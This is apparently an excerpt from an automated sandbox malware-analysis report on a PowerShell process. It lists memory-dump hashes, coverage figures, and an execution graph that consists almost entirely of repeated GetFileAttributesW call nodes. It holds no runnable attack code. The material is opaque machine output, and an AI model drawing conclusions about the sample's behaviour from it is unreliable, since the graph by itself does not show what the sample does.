                                                                                                                                                                                • Opcode ID: e52bb468c0127ff0ae415bc5a9d8ceee7ef6cdeb9d65dbfb52af665b530fb2de
                                                                                                                                                                                • Instruction ID: 8925628db444e92fae42027548b62473213a9f97283dd84cfc0f048226aac663
                                                                                                                                                                                • Opcode Fuzzy Hash: e52bb468c0127ff0ae415bc5a9d8ceee7ef6cdeb9d65dbfb52af665b530fb2de
                                                                                                                                                                                • Instruction Fuzzy Hash: DE81BF34B00204AFDB18EB78E860B6EB7E6AFC4651F55C169E446EB390CE34DC41CBA4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 72a501f326f4325f4dc9646e18e422b1808f838df94d612fae6d5b49c2b4ab47
                                                                                                                                                                                • Instruction ID: 599596cd190397ebd97533e4fcc51959228736dbfed8016e850fa04badfd380e
                                                                                                                                                                                • Opcode Fuzzy Hash: 72a501f326f4325f4dc9646e18e422b1808f838df94d612fae6d5b49c2b4ab47
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C815C74B00305EFDB24DB75E844B2F76F6AFC4752B18862DD5469B684DB38E841CB60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2173429287.0000000008D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d60000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c662b15370de8fd2ce1a86af95e957455e9dce3aa50b144f12c7d6d0ba82952f
                                                                                                                                                                                • Instruction ID: 70a5ff7a4585dc9f2cc5e2ad71cd6e1d426d9ffbe43f454c77765d971f9a2ddd
                                                                                                                                                                                • Opcode Fuzzy Hash: c662b15370de8fd2ce1a86af95e957455e9dce3aa50b144f12c7d6d0ba82952f
                                                                                                                                                                                • Instruction Fuzzy Hash: E941A2B1E042298FDB10CF66C8446AABBF2BF88350F068669D855E7351E771EA41CB90

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:9.3%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:1284
                                                                                                                                                                                Total number of Limit Nodes:81
                                                                                                                                                                                execution_graph 154944 3411a40 154945 3411a52 154944->154945 154949 3414950 154945->154949 154954 3414960 154945->154954 154946 3411a82 154950 341496a 154949->154950 154951 341498f 154950->154951 154959 3414a08 154950->154959 154964 3414a18 154950->154964 154951->154946 154955 341496a 154954->154955 154956 341498f 154955->154956 154957 3414a08 GetFileAttributesW 154955->154957 154958 3414a18 GetFileAttributesW 154955->154958 154956->154946 154957->154956 154958->154956 154960 3414a2b 154959->154960 154969 3414c00 154960->154969 154975 3414beb 154960->154975 154961 3414a49 154961->154951 154965 3414a2b 154964->154965 154967 3414c00 GetFileAttributesW 154965->154967 154968 3414beb GetFileAttributesW 154965->154968 154966 3414a49 154966->154951 154967->154966 154968->154966 154971 3414c15 154969->154971 154970 3414d1d 154970->154961 154971->154970 154981 34161f0 154971->154981 154973 34161f0 GetFileAttributesW 154973->154970 154976 3414c15 154975->154976 154978 3414d1d 154976->154978 154980 34161f0 GetFileAttributesW 154976->154980 154977 3414cdb 154977->154978 154979 34161f0 GetFileAttributesW 154977->154979 154978->154961 154979->154978 154980->154977 154985 3416810 154981->154985 154990 3416828 154981->154990 154982 3414cdb 154982->154970 154982->154973 154987 3416840 154985->154987 154986 3416855 154986->154982 154987->154986 154995 34163a4 154987->154995 154992 3416840 154990->154992 154991 3416855 154991->154982 154992->154991 154993 34163a4 GetFileAttributesW 154992->154993 154994 3416886 154993->154994 154994->154982 154996 3416d08 GetFileAttributesW 154995->154996 154998 3416886 154996->154998 154998->154982 154999 8972091 155000 8972099 154999->155000 155005 886e687 155000->155005 155012 886e5b1 155000->155012 155019 886e5c0 155000->155019 155001 897210a 155007 886e68c 155005->155007 155006 886e76f 155006->155001 155007->155006 155026 886ea78 155007->155026 155033 886eb8d 155007->155033 155040 886ee21 155007->155040 155047 886e8d9 155007->155047 155013 886e5f1 155012->155013 155014 886e76f 155013->155014 155015 886ee21 GetFileAttributesW 155013->155015 155016 886eb8d GetFileAttributesW 155013->155016 155017 886ea78 GetFileAttributesW 155013->155017 155018 886e8d9 GetFileAttributesW 155013->155018 155014->155001 155015->155014 155016->155014 155017->155014 155018->155014 155020 886e5f1 155019->155020 155021 886ee21 GetFileAttributesW 155020->155021 155022 886e76f 155020->155022 155023 886eb8d GetFileAttributesW 155020->155023 155024 886ea78 GetFileAttributesW 155020->155024 155025 886e8d9 GetFileAttributesW 155020->155025 155021->155022 155022->155001 155023->155022 155024->155022 155025->155022 155027 886ea7d 155026->155027 155028 886eb3f 155027->155028 155057 8868730 155027->155057 155062 88681b8 155027->155062 155076 8868683 155027->155076 155081 88681aa 155027->155081 155028->155006 155034 886eb95 155033->155034 155036 8868683 GetFileAttributesW 155034->155036 155037 8868730 GetFileAttributesW 155034->155037 155038 88681aa GetFileAttributesW 155034->155038 155039 88681b8 GetFileAttributesW 155034->155039 155035 886ec0a 155035->155006 155036->155035 155037->155035 155038->155035 155039->155035 155042 886eadf 155040->155042 155041 886eb3f 155041->155006 155042->155041 155043 8868683 GetFileAttributesW 155042->155043 155044 8868730 GetFileAttributesW 155042->155044 155045 88681aa GetFileAttributesW 155042->155045 155046 88681b8 GetFileAttributesW 155042->155046 155043->155041 155044->155041 155045->155041 155046->155041 155048 886e8f4 155047->155048 155168 886d57c 155048->155168 155178 886d461 155048->155178 155049 886ea73 155050 886eb3f 155049->155050 155051 8868683 GetFileAttributesW 155049->155051 155052 8868730 GetFileAttributesW 155049->155052 155053 88681aa GetFileAttributesW 155049->155053 155054 88681b8 GetFileAttributesW 155049->155054 155050->155006 155051->155050 155052->155050 155053->155050 155054->155050 155059 88686c8 155057->155059 155058 88686ef 155058->155028 155059->155058 155060 88681aa GetFileAttributesW 155059->155060 155061 88681b8 GetFileAttributesW 155059->155061 155060->155058 155061->155058 155063 88681de 155062->155063 155064 886820f 155063->155064 155065 88685f3 155063->155065 155095 8867c28 155064->155095 155103 8867c38 155064->155103 155066 8868662 155065->155066 155068 88686df 155065->155068 155069 886826c 155065->155069 155074 88681aa GetFileAttributesW 155066->155074 155075 88681b8 GetFileAttributesW 155066->155075 155067 886867e 155067->155028 155068->155067 155072 88681aa GetFileAttributesW 155068->155072 155073 88681b8 GetFileAttributesW 155068->155073 155069->155028 155072->155067 155073->155067 155074->155067 155075->155067 155078 8868688 155076->155078 155077 88686ef 155077->155028 155078->155077 155079 88681aa GetFileAttributesW 155078->155079 155080 88681b8 GetFileAttributesW 155078->155080 155079->155077 155080->155077 155082 88681b8 155081->155082 155083 886820f 155082->155083 155084 88685f3 155082->155084 155091 8867c28 GetFileAttributesW 155083->155091 155092 8867c38 GetFileAttributesW 155083->155092 155085 8868662 155084->155085 155087 886826c 155084->155087 155088 88686df 155084->155088 155089 88681aa GetFileAttributesW 155085->155089 155090 88681b8 GetFileAttributesW 155085->155090 155086 886867e 155086->155028 155087->155028 155088->155086 155093 88681aa GetFileAttributesW 155088->155093 155094 88681b8 GetFileAttributesW 155088->155094 155089->155086 155090->155086 155091->155087 155092->155087 155093->155086 155094->155086 155096 8867bc8 155095->155096 155097 8867c33 155095->155097 155096->155069 155098 8867c65 155097->155098 155110 88673a8 155097->155110 155128 8867488 155097->155128 155136 88673b8 155097->155136 155152 8867478 155097->155152 155098->155069 155104 8867c5f 155103->155104 155105 8867c65 155103->155105 155104->155105 155106 88673a8 GetFileAttributesW 155104->155106 155107 88673b8 GetFileAttributesW 155104->155107 155108 8867488 GetFileAttributesW 155104->155108 155109 8867478 GetFileAttributesW 155104->155109 155105->155069 155106->155105 155107->155105 155108->155105 155109->155105 155111 88673ab 155110->155111 155115 8867288 155110->155115 155119 3416810 GetFileAttributesW 155111->155119 155120 3416828 GetFileAttributesW 155111->155120 155112 88673d8 155112->155098 155113 88673d2 155113->155112 155114 886740a 155113->155114 155117 8867483 155113->155117 155121 88673a8 GetFileAttributesW 155114->155121 155122 88673b8 GetFileAttributesW 155114->155122 155115->155098 155116 8867424 155116->155098 155118 8867600 155117->155118 155123 34161f0 GetFileAttributesW 155117->155123 155125 88673a8 GetFileAttributesW 155117->155125 155126 88673b8 GetFileAttributesW 155117->155126 155127 8867478 GetFileAttributesW 155117->155127 155164 8867402 155117->155164 155118->155098 155119->155113 155120->155113 155121->155116 155122->155116 155123->155117 155125->155117 155126->155117 155127->155117 155130 88674a5 155128->155130 155129 8867600 155129->155098 155130->155129 155131 34161f0 GetFileAttributesW 155130->155131 155132 8867402 GetFileAttributesW 155130->155132 155133 88673a8 GetFileAttributesW 155130->155133 155134 88673b8 GetFileAttributesW 155130->155134 155135 8867478 GetFileAttributesW 155130->155135 155131->155130 155132->155130 155133->155130 155134->155130 155135->155130 155138 88673d2 155136->155138 155143 3416810 GetFileAttributesW 155136->155143 155144 3416828 GetFileAttributesW 155136->155144 155137 88673d8 155137->155098 155138->155137 155139 886740a 155138->155139 155141 8867483 155138->155141 155145 88673a8 GetFileAttributesW 155139->155145 155146 88673b8 GetFileAttributesW 155139->155146 155140 8867424 155140->155098 155142 8867600 155141->155142 155147 34161f0 GetFileAttributesW 155141->155147 155148 8867402 GetFileAttributesW 155141->155148 155149 88673a8 GetFileAttributesW 155141->155149 155150 88673b8 GetFileAttributesW 155141->155150 155151 8867478 GetFileAttributesW 155141->155151 155142->155098 155143->155138 155144->155138 155145->155140 155146->155140 155147->155141 155148->155141 155149->155141 155150->155141 155151->155141 155153 8867418 155152->155153 155155 8867483 155152->155155 155157 88673a8 GetFileAttributesW 155153->155157 155158 88673b8 GetFileAttributesW 155153->155158 155154 8867424 155154->155098 155156 8867600 155155->155156 155159 34161f0 GetFileAttributesW 155155->155159 155160 8867402 GetFileAttributesW 155155->155160 155161 88673a8 GetFileAttributesW 155155->155161 155162 88673b8 GetFileAttributesW 155155->155162 155163 8867478 GetFileAttributesW 155155->155163 155156->155098 155157->155154 155158->155154 155159->155155 155160->155155 155161->155155 155162->155155 155163->155155 155165 8867424 155164->155165 155166 88673a8 GetFileAttributesW 155164->155166 155167 88673b8 GetFileAttributesW 155164->155167 155165->155117 155166->155165 155167->155165 155169 886d537 155168->155169 155170 886d55e 155168->155170 155169->155170 155188 886c836 155169->155188 155205 886cb28 155169->155205 155215 886cb18 155169->155215 155225 886c0c0 155169->155225 155244 886bec0 155169->155244 155262 886bf0b 155169->155262 155280 886beb1 155169->155280 155170->155049 155179 886d49f 155178->155179 155180 886d55e 155178->155180 155179->155180 155181 886c836 GetFileAttributesW 155179->155181 155182 886bec0 GetFileAttributesW 155179->155182 155183 886c0c0 GetFileAttributesW 155179->155183 155184 886beb1 GetFileAttributesW 155179->155184 155185 886bf0b GetFileAttributesW 155179->155185 155186 886cb18 GetFileAttributesW 155179->155186 155187 886cb28 GetFileAttributesW 155179->155187 155180->155049 155181->155180 155182->155180 155183->155180 155184->155180 155185->155180 155186->155180 155187->155180 155189 886c842 155188->155189 155190 886c9fd 155189->155190 155192 886ca8b 155189->155192 155201 886bec0 GetFileAttributesW 155190->155201 155202 886c0c0 GetFileAttributesW 155190->155202 155203 886beb1 GetFileAttributesW 155190->155203 155204 886bf0b GetFileAttributesW 155190->155204 155191 886ca4c 155191->155170 155196 886c836 GetFileAttributesW 155192->155196 155197 886bec0 GetFileAttributesW 155192->155197 155198 886c0c0 GetFileAttributesW 155192->155198 155199 886beb1 GetFileAttributesW 155192->155199 155200 886bf0b GetFileAttributesW 155192->155200 155193 886cbc6 155194 886cd2c 155193->155194 155298 8869eee 155193->155298 155194->155170 155196->155193 155197->155193 155198->155193 155199->155193 155200->155193 155201->155191 155202->155191 155203->155191 155204->155191 155206 886cb5b 155205->155206 155210 886c836 GetFileAttributesW 155206->155210 155211 886bec0 GetFileAttributesW 155206->155211 155212 886c0c0 GetFileAttributesW 155206->155212 155213 886beb1 GetFileAttributesW 155206->155213 155214 886bf0b GetFileAttributesW 155206->155214 155207 886cbc6 155208 886cd2c 155207->155208 155209 8869eee GetFileAttributesW 155207->155209 155208->155170 155209->155208 155210->155207 155211->155207 155212->155207 155213->155207 155214->155207 155216 886cb5b 155215->155216 155220 886c836 GetFileAttributesW 155216->155220 155221 886bec0 GetFileAttributesW 155216->155221 155222 886c0c0 GetFileAttributesW 155216->155222 155223 886beb1 GetFileAttributesW 155216->155223 155224 886bf0b GetFileAttributesW 155216->155224 155217 886cbc6 155218 886cd2c 155217->155218 155219 8869eee GetFileAttributesW 155217->155219 155218->155170 155219->155218 155220->155217 155221->155217 155222->155217 155223->155217 155224->155217 155226 886c072 155225->155226 155228 886c0ce 155225->155228 155226->155170 155227 886c19c 155227->155170 155228->155227 155229 886c9fd 155228->155229 155231 886ca6d 155228->155231 155240 886bec0 GetFileAttributesW 155229->155240 155241 886c0c0 GetFileAttributesW 155229->155241 155242 886beb1 GetFileAttributesW 155229->155242 155243 886bf0b GetFileAttributesW 155229->155243 155230 886ca4c 155230->155170 155234 886c836 GetFileAttributesW 155231->155234 155235 886bec0 GetFileAttributesW 155231->155235 155236 886c0c0 GetFileAttributesW 155231->155236 155237 886beb1 GetFileAttributesW 155231->155237 155238 886bf0b GetFileAttributesW 155231->155238 155232 886cbc6 155233 886cd2c 155232->155233 155239 8869eee GetFileAttributesW 155232->155239 155233->155170 155234->155232 155235->155232 155236->155232 155237->155232 155238->155232 155239->155233 155240->155230 155241->155230 155242->155230 155243->155230 155246 886bee6 155244->155246 155245 886beed 155245->155170 155246->155245 155247 886c9fd 155246->155247 155249 886ca6d 155246->155249 155252 886bec0 GetFileAttributesW 155247->155252 155253 886c0c0 GetFileAttributesW 155247->155253 155254 886beb1 GetFileAttributesW 155247->155254 155255 886bf0b GetFileAttributesW 155247->155255 155248 886ca4c 155248->155170 155256 886c836 GetFileAttributesW 155249->155256 155257 886bec0 GetFileAttributesW 155249->155257 155258 886c0c0 GetFileAttributesW 155249->155258 155259 886beb1 GetFileAttributesW 155249->155259 155260 886bf0b GetFileAttributesW 155249->155260 155250 886cbc6 155251 886cd2c 155250->155251 155261 8869eee GetFileAttributesW 155250->155261 155251->155170 155252->155248 155253->155248 155254->155248 155255->155248 155256->155250 155257->155250 155258->155250 155259->155250 155260->155250 155261->155251 155264 886bf10 155262->155264 155263 886bf77 155263->155170 155264->155263 155265 886c9fd 155264->155265 155267 886ca6d 155264->155267 155270 886bec0 GetFileAttributesW 155265->155270 155271 886c0c0 GetFileAttributesW 155265->155271 155272 886beb1 GetFileAttributesW 155265->155272 155273 886bf0b GetFileAttributesW 155265->155273 155266 886ca4c 155266->155170 155274 886c836 GetFileAttributesW 155267->155274 155275 886bec0 GetFileAttributesW 155267->155275 155276 886c0c0 GetFileAttributesW 155267->155276 155277 886beb1 GetFileAttributesW 155267->155277 155278 886bf0b GetFileAttributesW 155267->155278 155268 886cbc6 155269 886cd2c 155268->155269 155279 8869eee GetFileAttributesW 155268->155279 155269->155170 155270->155266 155271->155266 155272->155266 155273->155266 155274->155268 155275->155268 155276->155268 155277->155268 155278->155268 155279->155269 155282 886bec0 155280->155282 155281 886beed 155281->155170 155282->155281 155283 886c9fd 155282->155283 155285 886ca6d 155282->155285 155288 886bec0 GetFileAttributesW 155283->155288 155289 886c0c0 GetFileAttributesW 155283->155289 155290 886beb1 GetFileAttributesW 155283->155290 155291 886bf0b GetFileAttributesW 155283->155291 155284 886ca4c 155284->155170 155293 886c836 GetFileAttributesW 155285->155293 155294 886bec0 GetFileAttributesW 155285->155294 155295 886c0c0 GetFileAttributesW 155285->155295 155296 886beb1 GetFileAttributesW 155285->155296 155297 886bf0b GetFileAttributesW 155285->155297 155286 886cbc6 155287 886cd2c 155286->155287 155292 8869eee GetFileAttributesW 155286->155292 155287->155170 155288->155284 155289->155284 155290->155284 155291->155284 155292->155287 155293->155286 155294->155286 155295->155286 155296->155286 155297->155286 155299 8869ef7 155298->155299 155300 8869fbb 155299->155300 155303 88691c8 155299->155303 155308 88691b7 155299->155308 155304 88691ec 155303->155304 155313 8868e54 155304->155313 155323 8868e68 155304->155323 155305 88691fd 155305->155300 155309 88691c8 155308->155309 155311 8868e54 GetFileAttributesW 155309->155311 155312 8868e68 GetFileAttributesW 155309->155312 155310 88691fd 155310->155300 155311->155310 155312->155310 155314 8868e68 155313->155314 155315 8868eaf 155314->155315 155317 8869144 155314->155317 155319 3416810 GetFileAttributesW 155315->155319 155320 3416828 GetFileAttributesW 155315->155320 155316 8868ed7 155316->155305 155321 8868e54 GetFileAttributesW 155317->155321 155322 8868e68 GetFileAttributesW 155317->155322 155318 8869196 155318->155305 155319->155316 155320->155316 155321->155318 155322->155318 155324 8868e93 155323->155324 155325 8868eaf 155324->155325 155326 8869144 155324->155326 155331 3416810 GetFileAttributesW 155325->155331 155332 3416828 GetFileAttributesW 155325->155332 155329 8868e54 GetFileAttributesW 155326->155329 155330 8868e68 GetFileAttributesW 155326->155330 155327 8869196 155327->155305 155328 8868ed7 155328->155305 155329->155327 155330->155327 155331->155328 155332->155328 155333 89781de 155335 89781c3 155333->155335 155334 89783db 155335->155334 155337 897b25c 155335->155337 155340 897bbc6 155337->155340 155338 897b269 155344 897bfcb 155340->155344 155349 897c039 155340->155349 155341 897bbd4 155341->155338 155345 897bfce 155344->155345 155358 897e5f0 155345->155358 155364 897e600 155345->155364 155346 897bfd6 155346->155341 155350 897bfd2 155349->155350 155351 897bfce 155349->155351 155353 897c047 155350->155353 155354 897e5f0 3 API calls 155350->155354 155355 897e600 3 API calls 155350->155355 155356 897e5f0 3 API calls 155351->155356 155357 897e600 3 API calls 155351->155357 155352 897bfd4 155352->155341 155354->155352 155355->155352 155356->155352 155357->155352 155359 897e88b 155358->155359 155360 897e629 155358->155360 155361 897e6a6 155360->155361 155370 8a10ff0 155360->155370 155378 8a11000 155360->155378 155361->155346 155365 897e88b 155364->155365 155366 897e629 155364->155366 155367 897e6a6 155366->155367 155368 8a10ff0 3 API calls 155366->155368 155369 8a11000 3 API calls 155366->155369 155367->155346 155368->155367 155369->155367 155372 8a11028 155370->155372 155371 8a1119e 155373 8a111b8 155371->155373 155392 8a122d0 155371->155392 155399 8a12489 155371->155399 155372->155371 155386 8a11950 155372->155386 155389 8a11958 155372->155389 155380 8a11028 155378->155380 155379 8a1119e 155381 8a111b8 155379->155381 155384 8a122d0 GetFileAttributesW 155379->155384 155385 8a12489 GetFileAttributesW 155379->155385 155380->155379 155382 8a11950 SetThreadUILanguage 155380->155382 155383 8a11958 SetThreadUILanguage 155380->155383 155382->155379 155383->155379 155384->155381 155385->155381 155387 8a11999 SetThreadUILanguage 155386->155387 155388 8a119c9 155387->155388 155388->155371 155390 8a11999 SetThreadUILanguage 155389->155390 155391 8a119c9 155390->155391 155391->155371 155393 8a1231c 155392->155393 155406 8a140a0 155393->155406 155410 8a144bd 155393->155410 155414 8a140b0 155393->155414 155418 8a1431f 155393->155418 155394 8a1256f 155394->155394 155400 8a12497 155399->155400 155402 8a140a0 GetFileAttributesW 155400->155402 155403 8a140b0 GetFileAttributesW 155400->155403 155404 8a144bd GetFileAttributesW 155400->155404 155405 8a1431f GetFileAttributesW 155400->155405 155401 8a1256f 155401->155401 155402->155401 155403->155401 155404->155401 155405->155401 155408 8a140c5 155406->155408 155407 8a140ed 155407->155394 155408->155407 155422 8a14aec 155408->155422 155411 8a141cf 155410->155411 155412 8a144a8 155410->155412 155411->155412 155413 8a14aec GetFileAttributesW 155411->155413 155412->155394 155413->155411 155415 8a140c5 155414->155415 155416 8a140ed 155415->155416 155417 8a14aec GetFileAttributesW 155415->155417 155416->155394 155417->155415 155419 8a141cf 155418->155419 155420 8a144a8 155419->155420 155421 8a14aec GetFileAttributesW 155419->155421 155420->155394 155421->155419 155423 8a14bb6 155422->155423 155424 8a14b17 155422->155424 155423->155408 155424->155423 155429 8a1be18 155424->155429 155435 8a1be8a 155424->155435 155441 8a1be09 155424->155441 155447 8a1bf28 155424->155447 155430 8a1be9d 155429->155430 155431 8a1be41 155429->155431 155430->155423 155431->155430 155452 8a1cec8 155431->155452 155460 8a1cf50 155431->155460 155432 8a1bf77 155432->155423 155437 8a1be92 155435->155437 155436 8a1be9d 155436->155423 155437->155436 155439 8a1cf50 GetFileAttributesW 155437->155439 155440 8a1cec8 GetFileAttributesW 155437->155440 155438 8a1bf77 155438->155423 155439->155438 155440->155438 155442 8a1be9d 155441->155442 155443 8a1be41 155441->155443 155442->155423 155443->155442 155445 8a1cf50 GetFileAttributesW 155443->155445 155446 8a1cec8 GetFileAttributesW 155443->155446 155444 8a1bf77 155444->155423 155445->155444 155446->155444 155448 8a1bf39 155447->155448 155450 8a1cf50 GetFileAttributesW 155448->155450 155451 8a1cec8 GetFileAttributesW 155448->155451 155449 8a1bf77 155449->155423 155450->155449 155451->155449 155453 8a1cee7 155452->155453 155455 8a1cf04 155453->155455 155458 8ac5738 GetFileAttributesW 155453->155458 155459 8ac5750 GetFileAttributesW 155453->155459 155454 8a1cf35 155454->155432 155455->155454 155456 8a1d080 GetFileAttributesW 155455->155456 155457 8a1d090 GetFileAttributesW 155455->155457 155456->155454 155457->155454 155458->155455 155459->155455 155461 8a1cf5e 155460->155461 155462 8a1cf0e 155460->155462 155463 8a1cf35 155462->155463 155464 8a1d080 GetFileAttributesW 155462->155464 155465 8a1d090 GetFileAttributesW 155462->155465 155463->155432 155464->155463 155465->155463 155971 3419228 155972 3419250 155971->155972 155974 341c607 IdentifyCodeAuthzLevelW 155972->155974 155973 341a5a4 155974->155973 155975 82f6e01 155976 82f6e32 155975->155976 155981 82f7878 155975->155981 155986 82f7d30 155975->155986 155991 82f7869 155975->155991 155996 82f7968 155975->155996 155983 82f7894 155981->155983 155982 82f78b4 155982->155976 155983->155982 156001 82f84a1 155983->156001 156012 82f84b0 155983->156012 155987 82f7d1b 155986->155987 155988 82f7a0a 155986->155988 155988->155987 155989 82f84a1 GetFileAttributesW 155988->155989 155990 82f84b0 GetFileAttributesW 155988->155990 155989->155988 155990->155988 155992 82f786c 155991->155992 155993 82f78b4 155992->155993 155994 82f84a1 GetFileAttributesW 155992->155994 155995 82f84b0 GetFileAttributesW 155992->155995 155993->155976 155994->155992 155995->155992 155998 82f796c 155996->155998 155997 82f7d1b 155997->155997 155998->155997 155999 82f84a1 GetFileAttributesW 155998->155999 156000 82f84b0 GetFileAttributesW 155998->156000 155999->155998 156000->155998 156002 82f84a4 156001->156002 156023 82f8c39 156002->156023 156053 82f8ee6 156002->156053 156064 82f8cc8 156002->156064 156081 82f9010 156002->156081 156092 82f8e10 156002->156092 156108 82f8eaa 156002->156108 156119 82f8d7d 156002->156119 156135 82f8c48 156002->156135 156003 82f84fe 156003->155983 156013 82f84b4 156012->156013 156015 82f8d7d GetFileAttributesW 156013->156015 156016 82f8eaa GetFileAttributesW 156013->156016 156017 82f8c39 GetFileAttributesW 156013->156017 156018 82f8c48 GetFileAttributesW 156013->156018 156019 82f8cc8 GetFileAttributesW 156013->156019 156020 82f8ee6 GetFileAttributesW 156013->156020 156021 82f8e10 GetFileAttributesW 156013->156021 156022 82f9010 GetFileAttributesW 156013->156022 156014 82f84fe 156014->155983 156015->156014 156016->156014 156017->156014 156018->156014 156019->156014 156020->156014 156021->156014 156022->156014 156024 82f8c3c 156023->156024 156025 82f8c5d 156024->156025 156026 82f8c6a 156024->156026 156029 82f8c9b 156024->156029 156025->156003 156036 82f8d7d GetFileAttributesW 156026->156036 156037 82f8eaa GetFileAttributesW 156026->156037 156038 82f8c39 GetFileAttributesW 156026->156038 156039 82f8c48 GetFileAttributesW 156026->156039 156040 82f8cc8 GetFileAttributesW 156026->156040 156041 82f8ee6 GetFileAttributesW 156026->156041 156042 82f8e10 GetFileAttributesW 156026->156042 156043 82f9010 GetFileAttributesW 156026->156043 156165 82f9220 156026->156165 156027 82f8c94 156027->156003 156028 82f8d27 156028->156003 156030 82f8d11 156029->156030 156171 87c1bc5 156029->156171 156176 87c19a2 156029->156176 156181 87c1a92 156029->156181 156186 87c19b8 156029->156186 156030->156028 156031 82f908f 156030->156031 156034 82f911a 156030->156034 156192 82f9b38 156031->156192 156032 82f9112 156032->156003 156033 82f91c1 156033->156003 156034->156033 156050 82f9b38 GetFileAttributesW 156034->156050 156197 82fa181 156034->156197 156202 82f9e80 156034->156202 156035 82f9291 156035->156035 156036->156027 156037->156027 156038->156027 156039->156027 156040->156027 156041->156027 156042->156027 156043->156027 156050->156035 156054 82f8ef2 156053->156054 156055 82f908f 156054->156055 156058 82f911a 156054->156058 156063 82f9b38 GetFileAttributesW 156055->156063 156056 82f9112 156056->156003 156057 82f91c1 156057->156003 156058->156057 156060 82f9b38 GetFileAttributesW 156058->156060 156061 82fa181 GetFileAttributesW 156058->156061 156062 82f9e80 GetFileAttributesW 156058->156062 156059 82f9291 156059->156059 156060->156059 156061->156059 156062->156059 156063->156056 156066 82f8ccc 156064->156066 156065 82f8d27 156065->156003 156066->156065 156067 82f8d11 156066->156067 156073 87c19b8 GetFileAttributesW 156066->156073 156074 87c1bc5 GetFileAttributesW 156066->156074 156075 87c19a2 GetFileAttributesW 156066->156075 156076 87c1a92 GetFileAttributesW 156066->156076 156067->156065 156068 82f908f 156067->156068 156071 82f911a 156067->156071 156080 82f9b38 GetFileAttributesW 156068->156080 156069 82f9112 156069->156003 156070 82f91c1 156070->156003 156071->156070 156077 82f9b38 GetFileAttributesW 156071->156077 156078 82fa181 GetFileAttributesW 156071->156078 156079 82f9e80 GetFileAttributesW 156071->156079 156072 82f9291 156072->156072 156073->156067 156074->156067 156075->156067 156076->156067 156077->156072 156078->156072 156079->156072 156080->156069 156082 82f9014 156081->156082 156083 82f908f 156082->156083 156085 82f911a 156082->156085 156088 82f9b38 GetFileAttributesW 156083->156088 156084 82f9112 156084->156003 156086 82f91c1 156085->156086 156089 82f9b38 GetFileAttributesW 156085->156089 156090 82fa181 GetFileAttributesW 156085->156090 156091 82f9e80 GetFileAttributesW 156085->156091 156086->156003 156087 82f9291 156087->156087 156088->156084 156089->156087 156090->156087 156091->156087 156093 82f8e20 156092->156093 156104 87c19b8 GetFileAttributesW 156093->156104 156105 87c1bc5 GetFileAttributesW 156093->156105 156106 87c19a2 GetFileAttributesW 156093->156106 156107 87c1a92 GetFileAttributesW 156093->156107 156094 82f8e88 156095 82f908f 156094->156095 156098 82f911a 156094->156098 156100 82f9b38 GetFileAttributesW 156095->156100 156096 82f9112 156096->156003 156097 82f91c1 156097->156003 156098->156097 156101 82f9b38 GetFileAttributesW 156098->156101 156102 82fa181 GetFileAttributesW 156098->156102 156103 82f9e80 GetFileAttributesW 156098->156103 156099 82f9291 156099->156099 156100->156096 156101->156099 156102->156099 156103->156099 156104->156094 156105->156094 156106->156094 156107->156094 156109 82f8eaf 156108->156109 156110 82f908f 156109->156110 156113 82f911a 156109->156113 156115 82f9b38 GetFileAttributesW 156110->156115 156111 82f9112 156111->156003 156112 82f91c1 156112->156003 156113->156112 156116 82f9b38 GetFileAttributesW 156113->156116 156117 82fa181 GetFileAttributesW 156113->156117 156118 82f9e80 GetFileAttributesW 156113->156118 156114 82f9291 156114->156114 156115->156111 156116->156114 156117->156114 156118->156114 156120 82f8d82 156119->156120 156121 82f8e88 156120->156121 156128 87c19b8 GetFileAttributesW 156120->156128 156129 87c1bc5 GetFileAttributesW 156120->156129 156130 87c19a2 GetFileAttributesW 156120->156130 156131 87c1a92 GetFileAttributesW 156120->156131 156122 82f908f 156121->156122 156125 82f911a 156121->156125 156127 82f9b38 GetFileAttributesW 156122->156127 156123 82f9112 156123->156003 156124 82f91c1 156124->156003 156125->156124 156132 82f9b38 GetFileAttributesW 156125->156132 156133 82fa181 GetFileAttributesW 156125->156133 156134 82f9e80 GetFileAttributesW 156125->156134 156126 82f9291 156126->156126 156127->156123 156128->156121 156129->156121 156130->156121 156131->156121 156132->156126 156133->156126 156134->156126 156136 82f8c4c 156135->156136 156137 82f8c5d 156136->156137 156138 82f8c6a 156136->156138 156141 82f8c9b 156136->156141 156137->156003 156152 82f8d7d GetFileAttributesW 156138->156152 156153 82f8eaa GetFileAttributesW 156138->156153 156154 82f8c39 GetFileAttributesW 156138->156154 156155 82f8c48 GetFileAttributesW 156138->156155 156156 82f8cc8 GetFileAttributesW 156138->156156 156157 82f8ee6 GetFileAttributesW 156138->156157 156158 82f8e10 GetFileAttributesW 156138->156158 156159 82f9010 GetFileAttributesW 156138->156159 156160 82f9220 GetFileAttributesW 156138->156160 156139 82f8c94 156139->156003 156140 82f8d27 156140->156003 156142 82f8d11 156141->156142 156161 87c19b8 GetFileAttributesW 156141->156161 156162 87c1bc5 GetFileAttributesW 156141->156162 156163 87c19a2 GetFileAttributesW 156141->156163 156164 87c1a92 GetFileAttributesW 156141->156164 156142->156140 156143 82f908f 156142->156143 156146 82f911a 156142->156146 156151 82f9b38 GetFileAttributesW 156143->156151 156144 82f9112 156144->156003 156145 82f91c1 156145->156003 156146->156145 156148 82f9b38 GetFileAttributesW 156146->156148 156149 82fa181 GetFileAttributesW 156146->156149 156150 82f9e80 GetFileAttributesW 156146->156150 156147 82f9291 